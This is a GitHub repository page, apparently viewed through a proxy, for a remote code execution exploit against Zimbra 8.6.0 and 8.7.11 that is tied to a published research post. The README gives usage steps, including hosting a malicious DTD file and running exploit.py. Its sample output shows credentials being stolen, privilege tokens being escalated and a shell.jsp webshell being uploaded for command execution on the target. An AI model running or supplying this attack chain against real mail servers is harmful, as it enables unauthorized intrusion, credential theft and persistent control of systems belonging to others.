Skip to content

nth347/Zimbra-RCE-exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
.idea
.idea
 
 
README.md
README.md
 
 
exploit.py
exploit.py
 
 
malicious_dtd
malicious_dtd
 
 
shell.jsp
shell.jsp
 
 

Repository files navigation

Zimbra-RCE-exploit

RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post. Tested with Zimbra 8.6.0, 8.7.11

Usage:

$ git clone https://github.com/nth347/Zimbra-RCE-exploit.git
$ cd Zimbra-RCE-exploit/
$ # Edit "Target configuration" part, host the "malicious_dtd" file on a webserver
$ chmod +x exploit.py
$ ./exploit.py

Example:

$ ./exploit.py                   
[i] Getting Zimbra credentials
[+] Got credentials: zimbra:XXXXXX

[i] Getting low-privilege token
[+] Got low-privilege token: XXXXX

[i] Getting high-privilege token
[+] Got high-privilege token: XXXXX

[i] Uploading webshell
[+] Uploaded webshell. Location https://mail.test.com/downloads/shell.jsp

webshell@target$ id
uid=999(zimbra) gid=999(zimbra) groups=999(zimbra),0(root)
webshell@target$

Reference:

About

RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post

Topics

security exploit zimbra

Resources

Readme
Activity

Stars

34 stars

Watchers

3 watching

Forks

5 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

Languages
pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy